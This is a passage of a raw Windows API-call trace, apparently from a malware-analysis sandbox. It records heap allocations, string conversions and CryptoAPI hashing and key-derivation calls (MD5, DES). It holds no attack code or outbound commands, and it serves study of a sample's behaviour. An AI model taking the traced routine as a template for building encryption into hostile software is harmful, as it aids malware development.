(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0263.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0263.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0263.092] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0263.092] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.092] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0263.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0263.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0263.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0263.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0263.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0263.092] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0263.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0263.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0263.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0263.093] CryptCreateHash (in: hProv=0xad2be8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0263.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0263.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0263.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0263.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0263.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0263.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0263.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0263.093] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0263.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0263.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0263.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0263.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0263.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0263.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0263.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0263.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0263.093] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.093] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0263.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0263.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0263.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0263.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0263.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0263.094] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0263.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0263.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0263.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0263.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0263.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0263.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0263.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0263.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0263.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0263.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0263.094] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0263.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0263.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0263.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0263.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0263.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0263.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0263.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0263.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0263.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0263.095] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0263.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0263.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0263.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0263.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0263.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0263.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0263.095] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0263.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0263.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0263.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0263.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0263.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0263.095] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0263.095] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0263.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0263.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0263.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0263.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0263.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0263.096] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0263.096] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.096] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0263.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0263.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0263.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0263.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0263.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0263.096] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0263.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0263.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0263.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0263.096] CryptHashData (hHash=0xaa5760, pbData=0x34a2080, dwDataLen=0x3, dwFlags=0x1) returned 1 [0263.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0263.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0263.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2130 [0263.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0263.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0263.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0263.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0263.096] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0263.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0263.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0263.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0263.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0263.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0263.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0263.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0263.097] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.097] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.097] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0263.097] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.097] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0263.097] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.097] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.097] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0263.097] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.097] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0263.097] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.097] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.097] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.097] CryptDeriveKey (in: hProv=0xad2be8, Algid=0x6601, hBaseData=0xaa5760, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5920) returned 1 [0263.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0263.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0263.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0263.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0263.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0263.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0263.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0263.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0263.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0263.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0263.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0263.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0263.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0263.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0263.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0263.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0263.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0263.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0263.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0263.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0263.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0263.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0263.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0263.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0263.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0263.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0263.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0263.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0263.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0263.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0263.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0263.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0263.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0263.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0263.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0263.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0263.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0263.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0263.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0263.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0263.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0263.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0263.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0263.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0263.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0263.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0263.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0263.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0263.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0263.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0263.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0263.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0263.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0263.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0263.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0263.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0263.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0263.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0263.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0263.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0263.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0263.100] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0263.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0263.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0263.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0263.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0263.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0263.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0263.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0263.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0263.101] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0263.101] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0263.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0263.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0263.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0263.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0263.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0263.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0263.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0263.101] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0263.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0263.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0263.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0263.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0263.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0263.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0263.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0263.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0263.101] PeekMessageW (in: 